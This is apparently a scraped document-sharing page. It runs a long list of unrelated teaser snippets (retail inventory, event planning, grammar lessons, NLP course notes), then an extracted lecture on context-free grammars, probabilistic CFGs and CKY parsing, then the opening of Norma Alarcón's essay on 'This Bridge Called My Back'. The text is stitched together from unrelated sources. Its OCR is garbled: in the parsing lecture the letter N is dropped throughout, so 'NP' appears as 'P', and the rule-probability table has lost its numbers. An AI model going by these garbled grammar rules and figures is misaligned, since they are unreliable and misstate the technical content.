MALL WORLD TIPS & TRICKS Quick Start Guide Mall World is a Facebook game developed by 50 Cubes and published by 6 Waves where players can start their own boutique, be creative by decorating it, offer fashionable
Designing a point of purchase display (POP) that works for you By: Scott Buchanan Wire to Wire Manufacturing Ltd. Gone are the days of dropping your product out to the local five and dime where the manager
2013 TOURNAMENT & EVENT PLANNING GUIDE Welcome to Oakdale Golf & Country Club and thank you for choosing us to host your event this year. It is my goal to insure that every event we host is a successful
INVENTORY MANAGEMENT AND CONTROL * Controlling Inventories. How to determine how much to order and how often to order.
INVENTORY MANAGEMENT AND CONTROL * INVENTORY MANAGEMENT AND CONTROL concerns most managers of agricultural marketing and supply businesses, whether they are retail, wholesale, or service oriented. The
Veterinary Practice Management Inventory Management for Veterinary Practices Although it plays a critical role in any business, inventory management is a task that is often handled ineffectively in veterinary
Choice Hotels Canada Foundation Golf Tournament Tool Kit This guide has been created to provide ideas, tips and tools to help you host a Golf Tournament to raise funds for the Choice Hotels Canada Foundation.
Business Basics: Inventory Management Wholesale/Retail 1. Introduction You are in trouble if you have to keep telling customers, "I'm sorry we're out of that size. May we order it for you?" Even though
INVENTORY IS YOUR RETAIL HEART Is it healthy? Paul Erickson RMSA Retail Solutions Customers judge your store everyday Customers are increasingly challenging The customer of today is NOT the customer
Session I Mastering the Basics Tips and Tricks Connected Features 11:00 am to 12:00 pm Review the support and training resources for The Uniform Solution so you are informed and empowered Review The Uniform
GENERAL CO-OP PROGRAM GUIDELINES Program Year The Promotional Fund Program runs from January 1 st thru December 31 st All claims and support documents for the program year must be submitted to NORDYNE
How to Plan a Charity Walk or Run Charity events in any form are always popular, but increasingly, many organizations are choosing to recruit their fundraisers through more interactive events such as walks
Retail Service WOW Your Current Customers Exceed Expectations To Gain New Ones Presented by: Becky Wilkins Retail Management Associates AGM Education Team The Educational Voice in Golf Merchandising Since
EXPENSE CONTROL A Profit Enhancing Opportunity General: Do you have a budget for all expenses? Do you review each expense category monthly? Do you know precisely what % of sales goes to expenses? Do you
Execute Price Changes in the Store More Effectively How integrated mobile technology can reduce price marking costs 25 percent to 40 percent
Oak Street The Complete Solution Eight years ago, I.S.S. set out to create a new, more powerful software package. We began with our 18 years of experience serving wholesalers. Then, we looked at the best
case study: Joe Davies Exhibitions form a crucial part of our sales strategy for showcasing new products Joe Davies Ltd is over 90 years old and remains a family business supplying giftware to the independent
Promotion & Advertising Tips Here is a basic truth of small business: if people don t know who you are, it doesn t matter how good your product and services are. Baring this in mind it, it is imperative
ECRS Customers Excel with Revolutionary DemandFill Technology and LogicSync - enhanced ECRS Gateway Below is a glimpse into what three ECRS customers are achieving with Catapult and ECRS Gateway and topics
Infor M3 Assortment Replenishment Planner Speed up decision making As a fashion brand owner with your own manufacturing or with a sourcing business model, or a private brand retailer, you are almost certainly
INVENTORY ACCOUNTING The flow of costs through the system and through the General Ledger can be somewhat complicated. This discussion will explain the flow plus give you suggestions on keeping the G/L
Martec International RST66 Martec International is a leading consulting and training firm specializing in the retail industry. Its client base includes retailers from around the globe, technology suppliers
The Business Case for Investing in Retail Data Analytics Why product manufacturers are investing in POS and inventory analytics solutions Introduction In the latest Shared Data Study from CGT and RIS News
Preseason Planning and Cash Flow Management Mike Barnidge Credit Manager This seminar provides a planning and forecasting tool you can use throughout the year to fine-tune your financials, plan for anticipated
Setting up Vend for retail success Guide to setting up your Vend store, products, customer management and more. Congratulations! You ve just gotten started with opening up your first Vend store! In this
Frequently Asked Questions General How long has the Presidio Golf Club (PGC) been in existence? The Club was founded in 1895 by a group of civilians who requested permission from the US Army to build a
Apparel SAP Business One Apparel & Footwear Introduction Now fashion companies can grow from small to extra-large with SAP Business One. Integrate and automate critical business processes with Apparel
White paper 12 tips for taking control of inventory control. Keeping track of inventory in a growing retail business is tricky. These 12 tips can make it easier. www.brightpearl.com Introduction When your
Making A Difference In 90 Days. Making Contact. How will you keep in touch with clients and prospects?
ABOUT FINANCIAL RATIO ANALYSIS Over the years, a great many financial analysis techniques have developed. They illustrate the relationship between values drawn from the balance sheet and income statement
Presented by: Tracy Moffatt, K&K Consulting, AGM Education Team What is hiding in Your POS System? Point of Sale Reports End of Day Reports Sales & Revenue Reports Inventory Analysis Reports Vendor Analysis
Guide to Effective Retail Merchandise Management A Step by Step Guide to Merchandising in a Retail Store By BizMove Management Training Institute Other free books by BizMove that may interest you: Free
Guide to event marketing & trade show display strategies This guide is brought to you by: For a complete show schedule please visit: www.outdooradventureshow.ca The return on your investment in consumer
Factors in Considering a Shopping Centre Location Small retailers, who seek new sites for their stores, or service shops, should add the shopping centre to their lists of possible locations. When they
Dear Potential Franchisee: Thank you for your interest in Real Deals on Home Décor. Our approach to owning your own business and home furnishings is totally unique. Here is our formula for success: 2 or
The First Steps to Achieving Effective Inventory Control By Jon Schreibfeder EIM Effective Inventory Management, Inc. This report is the first in a series of white papers designed to help forward-thinking
A Randall Data Systems White Paper Inventory Control: It s Your Money! The importance of knowing what you have and what you really need, and how inventory control software can help. Randall Data Systems,
WHY SHOULD I OWN A PARTY LAND FRANCHISE? 1. To Be A Leader It is not often that an opportunity presents itself to be a leader in an industry as opposed to just a follower. PARTY LAND has been a leader
APPENDIX D RETAIL INVENTORY METHOD OBJECTIVE 1 Determine ending inventory by applying the retail inventory method. Accounting for inventory in a retail operation presents several challenges. ers with certain
Know how much inventory is on hand. Inventory is money. Old and obsolete inventory can paralyze your business
WHITE PAPER Introduction Many small and medium-sized businesses are looking for smarter ways to operate in order to survive in this changing economy. After gaining control of your finances (generally with
Top Ten Tips for Successful Exhibiting Wondering how to plan your exhibit program to maximize your show results? Candy Adams, aka the "Booth Mom" lays it out in ten simple tips everyone can follow. 1.
Marketing Strategies & Merchandising Process ADM4307 Apparel Manufacturing By Dr. Shin, Ph.D. Associate Professor The role of the marketing division Marketing is a part of a firm s strategic plan. To market
Ross Stores, Inc. Investor Overview Disclosure of Risk Factors Forward-Looking Statements: This presentation contains forward-looking statements regarding expected sales, earnings levels and other financial
THEME: INVENTORY ESTIMATION TECHNIQUES By John W. Day, MBA ACCOUNTING TERMS: Retail Method Terminology Original Sales Price The retail price at which goods are originally offered for sale. Markup The difference
1 Context Free Grammars So far we have looked at models of language that capture only local phenomena, namely what we can analyze when looking at only a small window of words in a sentence. To move towards more sophisticated applications that require some form of understanding, we need to be able to determine larger structures and to make decisions based on information that may be further away than we can capture in any fixed window. Here are some properties of language that we would like to be able to analyze: 1. Structure and Meaning A sentence has a semantic structure that is critical to determine for many tasks. For instance, there is a big difference between Foxes eat rabbits and Rabbits eat foxes. Both describe some eating event, but in the first the fox is the eater, and in the second it is the one being eaten. We need some way to represent overall sentence structure that captures such relationships. 2. Agreement In English as in most languages, there are constraints between forms of words that should be maintained, and which are useful in analysis for eliminating implausible interpretations. For instance, English requires number agreement between the subject and the verb (among other things). Thus we can say Foxes eat rabbits but Foxes eats rabbits is illformed. In contrast, The Fox eats a rabbit is fine whereas The fox eat a rabbit is not. 3. Recursion atural languages have a recursive structure that is important to capture. For instance, Foxes that eat chickens eat rabbits is best analyzed as having an embedded sentence (i.e., that eat chickens) modifying the noun phases Foxes. This one additional rule allows us to also interpret Foxes that eat chickens that eat corn eat rabbits and a host of other sentences. 4. Long Distance Dependencies Because of the recursion, word dependencies like number agreement can be arbitrarily far apart from each other, e.g., Foxes that eat chickens that eat corn eats rabbits is awkward because the subject (foxes) is plural while the main verb (eats) is singular. In principle, we could find sentences that have an arbitrary number of words between the subject and its verb. Tree Representations of Structure The standard representation of sentence structure to capture these properties is a tree structure as shown in Figure 1 for the sentence The birds in the field eat the corn. A tree consists of labeled nodes with arcs indicates a parent-child relationship. Trees have a unique root node (S in figure 1). Every node except the root has exactly one parent node, and 0 or more children. odes without children are called the leaf nodes. This tree captures the following structural analysis: there is a sentence (S) that consists of an P followed by a VP. The P is an article ART followed by a noun () and a prepositional phrase (PP). The ART is the, the is birds and the PP consists of a proposition (P) followed by an P. The P is in, and the P consists of an ART (the) followed by a ( field). Returning to the VP, it consists of a V followed by an P, and so on through the structure. ote that the tree form readily captures the recursive nature of language. In this tree we have an P as a subpart of a larger P. Thus this structure could also easily represent the structure of the sentence The birds in the field in the forest eat the corn, where the inner P itself also contains a PP that contains another P. 1
2 ote also that the structure allows us to S state dependencies between constituents in a concise way. For instance, English ART P PP VP V P requires number agreement P P ART between the subject P (however The birds in ART the field eat the corn complex) and the main verb. Figure 1: A tree representation of sentence structure This constraint is easily captured as additional information on when an P followed by a VP can produce a reasonable sentence S. To make properties like agreement work in practice would require developing a more general formalism for expressing constraints on trees, which takes us beyond our focus in this course (but see a text on atural Language Understanding). The Context-Free Grammar Formalism Given a tree analysis, how do we tell what trees characterize acceptable structures in the language? The space of allowable trees is specified by a Grammar, in our case a Context Free Grammar (CFG). A CFG consists of a set of the form category 0 -> catagory 1... category n which states that a node labeled with category0 is allowed in a tree when if has n children of categories (from left to right) catagory 1... category n. For example, Figure 2 gives a set of rules that would allow all the trees in the previous figures. You can easily verify that every parent-child relationship shown in each of the trees is listed as a rule in the grammar. Typically, a CFG defines an infinite space of possible trees, and for any given sentence there may be a number of possible trees that are possible. These different trees can provide an account of some of the ambiguities that are inherent in language. For example, Figure 3 provides two trees associated with the sentence I hate annoying neighbors. On the left, we have the interpretation that S -> P VP P -> PRO P -> ART P -> P -> ADJ P -> P S VP -> V P VP -. V VP Figure 2: A context-free grammar the neighbors are noisy and we don t like them. On the right, we have the interpretation that we don t like doing things (like playing loud music) that annoy our neighbors. 2
3 S S P VP P VP PRO V P PRO V VP ADJ V P I hate annoying neighbors I hate annoying neighbors Figure 3: Two tree representation of the same sentence This ambiguity arises from choosing a different lexical category for the word annoying, which then forces different structural analyses. There are many other cases of ambiguity that are purely structural, and the words are interpreted the same way in each case. The classic example of this is the sentence I saw the man with a telescope, which is ambiguous between me seeing a man holding a telescope and me using a telescope to see a man. This ambiguity would be reflected in where the prepositional phrase with a telescope attached into the parse tree. Probabilistic Context Free Grammars Given a grammar and a sentence, a natural question to ask it 1) whether there is any tree that accounts for the sentence (i.e., is the sentence grammatical), and 2) if there are many trees, which is the right interpretation (i.e., disambiguation). For the first question, we need to be able to build a parse tree for a sentence if one exists. To answer the second, we need to have some way of comparing the likelihood of one tree over another. There have been many attempts to try to find inherent preferences based on the structure of trees. For instance, we might say we prefer tree that are smaller over ones that are larger. But none of these approaches has been able to provide a satisfactory account of parse preferences. Putting this into a probabilistic framework, given a grammar G, sentence s, and a set of trees T s that could account for s (i.e, each t has s as its leaf nodes), we want the parse tree that is argmax t in Ts P G (t s ) To compute this directly, we would need to know the probability distribution P G (T), where T is the set of all possible trees. Clearly we will never be able to estimate this distribution directly. As usual, we must make some independence assumptions. The most radical assumption is that each node in the tree is decomposed independently of the rest of the nodes in the tree. In other words, 3
4 T 1 T 1.1 T 1.2 T T T T T T T T T T T w 1 w 2 w 3 w 4 w 5 w 6 w 7 w 8 Figure 4: The notation for analyzing trees say we have a tree T consisting of nodes T 1, with children T 1.1,, T 1.n, with T i.j having children T i,j,1,, T i,j,m and so on, as shown in figure 4. Thus making the independence assumption about, we d say P(T 1 ) = P(T 1 T 1.1 T 1.2 ) * P(T 1.1 ) * P(T 1.2 ) Using the independence assumptions repeatedly, we can expand P(T 1.1 ) to P(T 1.1 T T T ) * P(T ) * P(T ) * P(T ), and so on until we have expanded out the probabilities of all the subtrees. Having done this, we d end up with the following: P(T) =S r P(r ) where r ranges over all rules used to construct T The probability of a rule r is the probability that the rule will be used to rewrite the node on the right hand side. Thus, if 3/4 of Ps are built by the rule P -> ART, then the probability of this rule would be.75. This formalism is called a probabilistic context-free grammar (PCFG). Estimating Rule Probabilities There are a number of ways to estimate the probabilities for a PCFG. The best, but most labor intensive way is to hand-construct a corpus of parse trees for a set of sentences, and then estimate the probabilities of each rule being used by counting over the corpus. Specifically, the MLE estimate for a rule RHS -> LHS would be P MLE (RHS->LHS) = Count(RHS->LHS) / S c Count(RHS -> c) For example, given the trees in figures 1 and 2 as our training corpus, we would obtain the 4
5 estimates for the rule probabilities in figure 5. Rule Count Total for RHS MLE Estimate S -> P VP P -> PRO P -> ART P -> P -> ADJ P -> ART ADJ VP -> V P VP -> V VP PP -> P P PRO -> I V -> hate V -> annoying ADJ -> annoying > neighbors Figure 5: The MLE Estimates from Trees in Figs 1 and 3 Given this model, we can now answer which interpretation in Figure 3 is more likely. The tree on the left (ignoring for the moment the words) involves rules S->P VP, P->PRO, VP->V P, P->ADJ, PRO-> I, V->hate, ADJ->annoying and ->neighbors, and thus has a probability of 1 *.29 *.75 *.15 * 1 *.5 * 1 *.25 =.004, whereas the tree on the right involves rules S->P VP, P->PRO, VP-> V VP, VP-> V P, P->, PRO-> I, V->hate, ADJ- >annoying and ->neighbors, and thus has a probability of 1 *.29 *.25 *.75 *.15 * 1 *.5 * 1 *.25 =.001. Thus the tree on the left appears more likely. ote that one reason that there is a large difference in probabilities is because the tree on the right involved one more rule. In general, PCFG will tend to prefer interpretations that involve the fewest number of rules. ote that the probabilities of the lexical rules would be the same as the tag output probabilities we looked at when doing part of speech tagging, i,e, P(ADJ -> Annoying) = P(Annoying ADJ) Parsing Probabilistic Context Free Grammars To find the most likely parse tree, it might seem that we need to search an exponential number of possible trees. But using the probability model described above with its strong independence assumptions, we can use dynamic programming techniques to incrementally build up all possible constituents that cover one word, then two, and so on, over all words in the sentence. Since the probability of a tree is independent of how its subtrees were built, we can collapse the search at each point by just remembering the maximum probability parse. This algorithm looks similar to the min edit distance and Viterbi algorithms we developed earlier. 5
6 P 1.29 ADJ 3 1 P PRO 1 1 V 2.5 V I hate annoying neighbors Figure 6: The best probabilities for all constituents of length 1 Let s assign each word a number. So for the sentence I hate annoying neighbors, the word I would be 1, hate would be 2, and so on. Also, to simplify matters, let s assume all grammar rule are of only two possible forms, namely X -> Y Z X -> w, where w is a word (i.e., there are 1 or 2 categories on the right hand side). This is called Chomsky ormal Form, and it can be shown that all context free grammars have an equivalent grammar in this form. The parsing algorithm is called the probabilistic CKY algorithm. It first builds all possible hypotheses of length one by considering all rules that could produce each of the words. Figure 6 shows all non-zero probabilities of the words, where we assume that I can be a pronoun (.9) or a noun (.1 - the letter i ), hate is a verb, annoying is a verb (.7) or ADJ (.3), and neighbors is a noun. We first add all the lexical probabilities, and then use the rules to build any other constituents of length 1 as shown in Figure 6. For example, at position 1 we have an P constructed from the rule P -> PRO (prob.29) and constituent PRO 1 (prob.1), yielding P 1 with prob.29. Likewise at position 4, we have an with probability.25 ( 4 ) which with rule P-> (prob..15) which produces an P with probability The next iteration constructs finds the maximum probability for all possible constituents of length two. In essence, we iterate though every non-terminal and every pair of points to find the maximum probability combination that produces that non-terminal (if there is any at all). Consider this for P, where P i,j will be an P from position i to position j: P(P 1,2 ) = 0 (no rule that produces an P has a non-zero LHS) P(P 2,3 ) = 0, for same reasons P(P 3,4 ) = P(P-> ADJ )*P(ADJ 3 )*P( 4 ) =.15 * 1 *.25 = The only other non-zero constituent of length 2 in this simple example is VP 3,4, which has probability P(VP->V P)*P(V 3 )*P(P 4 ) =.75*.25 *.0375 =.007. The results after this iteration are shown as Figure 7. The next iteration is building constituents of length 3. Here we have the first case we have VP 3,4.007 P 3, P 1.29 ADJ 3 1 P PRO 1 1 V 2.5 V I hate annoying neighbors Figure 7: The best probabilities for all constituents of length 1 and 2 6
7 competing alternatives for the same constituent. In particular, VP 2,4 has two possible derivations, using rule VP->V P or using rule VP -> V VP. Since we are interested only in finding the maximum parse tree here, we want whichever one gives the maximum probability. VP->V P: P(VP->V P) *P(V 2 )*P(P 3,4 ) =.75 *.5 *.0375 =.014 VP->V VP: P(VP->V VP) *P(V 2 )*P(VP 3,4 ) =.25 *.5 *.007 =.0008 Thus we add VP 3,4 with probability.014. ote that to recover the parse tree at the end, we would also have to record what rule and subconstituents were used to produce the maximum probability interpretation. As we move to the final iteration, note that there is only one possible combination to produce S 1,4, namely combining P 1 with VP 2,4. Because we dropped the other interpretation of the VP, that parse tree is not considered at the next level up. It is this property that allows us to search efficiently for the highest probability parse tree. There is only one possibility for a constituent of length four, combining P 1, VP 2,4 and rule S->P VP, yielding the probability of S 1,4 of.004 (as we got for this tree before). ote that the CKY algorithm computed the highest probability tree for each constituent type over each possible word sequence, similar to the Viterbi algorithm finding the probability of the best path to each node and each time. A simple variant of the CKY algorithm could add all the probabilities of the trees together a produce an algorithm analogous to computing the forward probabilities in HMMs. This value is called the inside probability and is defined as follows, where w i,j is the sequence of words from i to j, is a constituent name and i,j is indicates that this constituent generates the input from positions i to j. Inside G (, i, j) = P G (w i,j i,j ) i.e., the probability that the grammar G generates w i,j given we know that constituent is the root of the tree covering position i through j. Another probability that is often used in algorithms involving PCFGs is the outside probability. This is the probability that a constituent appears between positions i and j given the context of the words on either side of the constituent (i.e., from 1 to i and j to the end). In other words, outside G (, i, j) = P G (w 1,I-1, i,j, w j+1,n ) If we put these two together, we get the probability that a constituent generate the words between position i and j for a given input w 1,n. P G ( i,j w 1,n ) = inside k (, i, j)*outside k (, i, j) 7
8 S S w 1 w i w j w n w 1 w i w j w n Figure 8: Inside and Outside Probabilities Evaluating Parser Accuracy A quick look at the literature will reveal that statistical parsers appear to be performing very well on quite challenging texts. For example, a common test corpus is text from the Wall Street Journal, which contains many very long sentences with quite complex structure. The best parsers report that that attain about a 90% accuracy in identifying the correct constituents. Seeing this, one might conclude that parsing is essentially solved. But this is not true. Once we look at the details in these claims, we see there is much that remains to be done. First, a 90% constituent accuracy sounds good, but what does this translate into as far as how many sentences are pared accurately. Lets say we have a sentence that involves 20 constituents. Then the probability of getting a sentence completely correct is.9 20 =.28. So the parser would only be getting 28% of the parses completely correct. Second, the results also depend on the constraints on the grammar itself. For instance, its easy to write a context free grammar that generates all sentences with two rules: S -> w S -> S S i.e., a sentence is a sequence of words. Clearly getting the correct parse for this grammar would be trivial. Thus to evaluate the results, we need to consider whether the grammars are producing structures that will be useful for subsequent analysis. We should require, for instance, that the grammar requires that we identify all the major constituents in the sentences. In most grammatical models, the major constituents involves noun phrases, verb phrases and sentences, and adjective and adverbial phrases. Typically, the grammars being evaluated do meet this requirements. But for certain constructs that are important for semantic analyses (like whether a phrase is an argument to a verb or a modifier of the verb), the current grammars collapse these distinctions. So if we want a grammar for semantic analysis, the results will look even worse. The lesson here is not to accept accuracy numbers without a careful consideration of what assumptions are being made and how the results might be used. 8
Assignment 3. Due date: 13:10, Wednesday 4 November 2015, on CDF. This assignment is worth 12% of your final grade.
University of Toronto, Department of Computer Science CSC 2501/485F Computational Linguistics, Fall 2015 Assignment 3 Due date: 13:10, Wednesday 4 ovember 2015, on CDF. This assignment is worth 12% of
Outline of today s lecture Generative grammar Simple context free grammars Probabilistic CFGs Formalism power requirements Parsing Modelling syntactic structure of phrases and sentences. Why is it useful?
Name: Block: Date: Grammar Imitation Lessons: Simple Sentences This week we will be learning about simple sentences with a focus on subject-verb agreement. Follow along as we go through the PowerPoint
Parsing Technology and its role in Legacy Modernization A Metaware White Paper 1 INTRODUCTION In the two last decades there has been an explosion of interest in software tools that can automate key tasks
Tagging with Hidden Markov Models Michael Collins 1 Tagging Problems In many NLP problems, we would like to model pairs of sequences. Part-of-speech (POS) tagging is perhaps the earliest, and most famous,
No. Semester-Examination of CS674 Name: 1. The sentence John drank a glass of milk can be paraphrased as John ingested the milk by getting the milk to his mouth from glass by transferring the glass containing
Albert Pye and Ravensmere Schools Grammar Curriculum Introduction The aim of our schools own grammar curriculum is to ensure that all relevant grammar content is introduced within the primary years in
Constraints in Phrase Structure Grammar Phrase Structure Grammar no movement, no transformations, context-free rules X/Y = X is a category which dominates a missing category Y Let G be the set of basic
Syntax: Phrases Sentences can be divided into phrases. A phrase is a group of words forming a unit and united around a head, the most important part of the phrase. The head can be a noun NP, a verb VP,
Mterm I Please read all instructions (including these) carefully. There are six questions on the exam, each worth between 15 and 30 points. You have 3 hours to work on the exam. The exam is closed book,
GRAPH THEORY LECTURE 4: TREES Abstract. 3.1 presents some standard characterizations and properties of trees. 3.2 presents several different types of trees. 3.7 develops a counting method based on a bijection
www.methodtestprep.com Review of Grammar Rules Frequently tested on the ACT The English section of the ACT is extremely repetitive. The test makers ask you about the same grammar mistakes on every test.
Induction. Margaret M. Fleck. 10 October These notes cover mathematical induction and recursive definition
Induction Margaret M. Fleck 10 October 011 These notes cover mathematical induction and recursive definition 1 Introduction to induction At the start of the term, we saw the following formula for computing
English Parts of speech Parts of Speech There are eight parts of speech. Here are some of their highlights. Nouns Pronouns Adjectives Articles Verbs Adverbs Prepositions Conjunctions Click on any of the
English Appendix 2: Vocabulary, grammar and punctuation The grammar of our first language is learnt naturally and implicitly through interactions with other speakers and from reading. Explicit knowledge
Cambridge English: Proficiency (CPE) Frequently Asked Questions (FAQs) Is there a wordlist for Cambridge English: Proficiency exams? No. Examinations that are at CEFR Level B2 (independent user), or above
Why is it important? Academic Support, Student Services Learning Vocabulary A degree in Modern Languages requires a number different kinds of learning. Learning vocabulary is very different from writing
CINTIL-PropBank I. Basic Information 1.1. Corpus information The CINTIL-PropBank (Branco et al., 2012) is a set of sentences annotated with their constituency structure and semantic role tags, composed
Why language is hard. And what Linguistics has to say about it. Natalia Silveira Participation code: eagles
Why language is hard And what Linguistics has to say about it Natalia Silveira Participation code: eagles Christopher Natalia Silveira Manning Language processing is so easy for humans that it is like
Statistical Machine Translation: IBM Models 1 and 2 Michael Collins 1 Introduction The next few lectures of the course will be focused on machine translation, and in particular on statistical machine translation
Chapter 1 Language Modeling (Course notes for NLP by Michael Collins, Columbia University) 1.1 Introduction In this chapter we will consider the the problem of constructing a language model from a set
CHAPTER 1 The parts of speech: the basic labels The Western traditional parts of speech began with the works of the Greeks and then the Romans. The Greek tradition culminated in the first century B.C.
SYNTAX Syntax the study of the system of rules and categories that underlies sentence formation. 1) Syntactic categories lexical: - words that have meaning (semantic content) - words that can be inflected
Rethinking the relationship between transitive and intransitive verbs Students with whom I have studied grammar will remember my frustration at the idea that linking verbs can be intransitive. Nonsense!
Improve sentence structures Our writing instruction can often operate at the whole text type structural level. At this level, we teach students about: What a text type looks like How it s structured -
Subject-Verb Agreement A grammar help worksheet by Abbie Potter Henry (Subjects are in bold typeface and verbs are underlined) Subject-Verb Agreement means that subjects and verbs must always agree in
in the Sentence 2 What is a grammatical category? A word with little meaning, e.g., Determiner, Quantifier, Auxiliary, Cood Coordinator, ato,a and dco Complementizer pe e e What is a lexical category?
Introduction. Compiler Design CSE 504. Overview. Programming problems are easier to solve in high-level languages
Overview of topics What is Syntax? Word Classes What to remember and understand: Ling 201 Syntax 1 Jirka Hana April 10, 2006 Syntax, difference between syntax and semantics, open/closed class words, all
Level 3 Shirley English SEPTEMBER: Chapter 1 Pages 1-9 Lesson 1 Long- term goals and short- term goals Lesson 2 Beginning setup plan for homeschool, WRITING (journal) Lesson 3 SKILLS (synonyms, antonyms,
Linear Programming March 1, 01 Parts of this introduction to linear programming were adapted from Chapter 9 of Introduction to Algorithms, Second Edition, by Cormen, Leiserson, Rivest and Stein [1]. 1
Online Tutoring System For Essay Writing 2 Online Tutoring System for Essay Writing Unit 4 Infinitive Phrases Review Units 1 and 2 introduced some of the building blocks of sentences, including noun phrases
Regular Expressions with Nested Levels of Back Referencing Form a Hierarchy Kim S. Larsen Odense University Abstract For many years, regular expressions with back referencing have been used in a variety
Blake,C. (In Press) The Role of Sentence Structure in Recognizing Textual Entailment. ACL-PASCAL Workshop on Textual Entailment and Paraphrasing, Prague, Czech Republic. The Role of Sentence Structure
Log-Linear Models Michael Collins 1 Introduction This note describes log-linear models, which are very widely used in natural language processing. A key advantage of log-linear models is their flexibility:
This unit will lay the groundwork for later units where the students will extend this knowledge to quadratic and exponential functions.
Algebra I Overview View unit yearlong overview here Many of the concepts presented in Algebra I are progressions of concepts that were introduced in grades 6 through 8. The content presented in this course
Sentence Lifting TGM Sentence Lifting is a whole class instructional activity that takes 15 minutes to complete. This activity will help introduce or reinforce grade-level mechanics, spelling, and grammar
Phrase-Based Translation Models Michael Collins April 10, 2013 1 Introduction In previous lectures we ve seen IBM translation models 1 and 2. In this note we will describe phrasebased translation models.
LESSON THIRTEEN STRUCTURAL AMBIGUITY. Structural ambiguity is also referred to as syntactic ambiguity or grammatical ambiguity.
LESSON THIRTEEN STRUCTURAL AMBIGUITY Structural ambiguity is also referred to as syntactic ambiguity or grammatical ambiguity. Structural or syntactic ambiguity, occurs when a phrase, clause or sentence
Jessica's English Sentences Dolch K-3 Sentences 1-218 Vocabulary and Grammar By Jessica E. Riggs Students should master at least ten of the sentences per day, ideally, and be able to write them at once
Speaking Sample test with examiner s comments This document will help you familiarise yourself with the Speaking test for Cambridge English: Advanced, also known as Certificate in Advanced English (CAE).
WRITING PROOFS Christopher Heil Georgia Institute of Technology A theorem is just a statement of fact A proof of the theorem is a logical explanation of why the theorem is true Many theorems have this
According to the Argentine writer Jorge Luis Borges, in the Celestial Emporium of Benevolent Knowledge, animals are divided
Categories Categories According to the Argentine writer Jorge Luis Borges, in the Celestial Emporium of Benevolent Knowledge, animals are divided into 1 2 Categories those that belong to the Emperor embalmed
Glossary of terms: Term Definition Example active voice An active verb has its usual pattern of subject and object (in contrast to the passive voice). Active The school arranged a visit. Passive: adverbs
Statistical Machine Translation Some of the content of this lecture is taken from previous lectures and presentations given by Philipp Koehn and Andy Way. Dr. Jennifer Foster National Centre for Language
SEVENTH WEEK COMPLEX SENTENCES: THE NOUN CLAUSE COMPLEX SENTENCE: a kid of sentence which has one independent clause and one or more dependent clauses. KINDS OF DEPENDENT CLAUSES: (a) Adverb Clause (b)
Section 1.5 Exponents, Square Roots, and the Order of Operations Objectives In this section, you will learn to: To successfully complete this section, you need to understand: Identify perfect squares.
NOUNS, VERBS, ADJECTIVES OH, MY! GRADE LEVEL(S) 1-3 LESSON OBJECTIVE Students will reinforce their ability to identify, understand and use the basic parts of speech in the real world setting of the Santa
1 Norma Alarcon The Theoretical Subjectts) of This Bridge Called My Back and Anglo-American Feminism (from Criticism in the Borderlands. Studies in Chicanpo Literature, Culture and Ideology. Edited by Hector Calderon and Jose Davod Saldivar. Durham and London: Duke U.P., This Bndge Called My Back: Wntings by Radical Women of Color II983), edited by Chicana writers Cherrie Moraga and Gloria Anzaldua,1 was intended as a collection of essays, poems, tales, and testimonials that would give voice to the contradictory experiences of "women of color." To make explicit this end, the editors wrote: We are the colored in a white feminist movement. We are the feminists among the people of our culture. We are often the lesbians among the straight.{23) By giving voice to such experiences, each according to her style, the editors and contributors believed they were developing a theory of subjectivity and culture that would demonstrate the considerable difference between thcn1 and Anglo-American women, as well as between Anglo-European men and men of their culture. As a speaking subject of an emergent discursive formation, the writer in Bridge was aware of the displacement of her subjectivity across a multiplicity of discourses: feminist/leshian, nationalist, racial, and socioeconomic. The peculiarity of her displacement implied a multiplicity of positions from which she was driven to grasp or understand herself and her relations with the real, in the Althusserian sense of the word (Althusser I97I). The writer in Bndge, in part, was aware that these positions were often incompatible or contradictory, and problematic, since many readers would not have access to the maze of discourses competing for her body and her voice. This self- conscious effort to reflect on her "flesh and blood experiences to concretize a vision that [couldl begin to heal [theirl 'wounded knee"' (23) led many a Bridge speaker to take up a position in conflict with (28) multiple inter- and intracultural discursive interpretations in an effort to come to grips with
2 "the many-headed demon of oppression" II95). Since its publication in I98I, Bndge has had a diverse impact on feminist writings in the United States. Teresa de Lauretis, for example, claims that Bndge has contributed to a "shift in feminist consciousness" (1987, IO), although her explanation fails to clarify what the shift consists of and for whom. There is little doubt, however, that Bridge along with eighties writings by many women of color in the United States has problematized many a version of Anglo- American feminism and has helped open the way for alternate feminist discourses and theories. Presently, however, the impact among most Anglo-American theorists appears to be more cosmetic than not because, as Jane Flax has recently noted, "The modal 'person' in feminist theory still appears to be a selfsufficient individual adult" ( I 987,640). This particular "modal person" corresponds to the female subject most admired in Western literature which Gayatri Chakravorty Spivak has characterized as the one who "articulates herself in shifting relationship to... the constitution and 'interpellation'of the subject not only as individual but as 'individualist"' (I985,243-44~. Consequently, the "native female" or "woman of color" can be excluded from the discourse of feminist theory. The 'native female,' the object of colonialism and racism, is excluded because, in Flax's terms, white feminists have not "explored how our understanding of gender relations, self, and theory are partially constituted in and through experiences of living in a culture in which asymmetric race relations are a central organizing principle of society" (1987,640). It is clear that the most popular subject of Anglo-American feminist theorizing is an autonomous, self-making, self-determining subject who first proceeds according to the logic of identification with regard to the subject of consciousness, a notion usually viewed as the purview of man, but now claimed for women (see Kristeva I98I, I9). And believing that in this respect she is the same as man, she now claims the right to pursue her own identity, to name herself, to pursue self-knowledge, and in the words of Adrienne Rich to effect "a change in the concept of sexual identity" (1979, 35) Though feminism has problematized gender relations as "the single most important
3 advance in feminist theory" (Flax 1987, 627i, it has not problematized the subject of knowledge and her complicity with the notion of consciousness as "synthetic unificatory power, the centre and active point of organization of representations determining their concatenation" (Pecheux 1982, 122). The subject (and object) of knowledge is now a woman, but the inherited view of consciousness has not been questioned at all. As (29) a result some Anglo-American feminist subjects of consciousness have tended to become a parody of the masculine subject of consciousness, thus revealing their ethnocentric liberal underpinnings. In 1982 Jean Bethke Elshtain noted the "masculine cast" of radical feminist language, specifically citing the terms of "raw power, brute force, martial discipline, law and order with a feminist face and voice" (6II). Also in critiquing liberal feminism and its language, she wrote that "no vision of the political community that might serve as the groundwork of a life in common is possible within a political life dominated by a selfinterested, predatory individualism" (6I7~. Althusser has argued that this tradition "has privileged the category of the 'subject' as Origin, Essence and Cause, responsible in its internality for all determinations of the external object. In other words, this tradition has promoted Man, in his ideas and experience, as the source of knowledge, morals and history" (cited by MacDonell I986,76~. By identifying in this way with this tradition, standpoint epistemologists have substituted, ironically, woman for man. This logic of identification as a first step in constructing the theoretical subject of feminism is often veiled from standpoint epistemologists 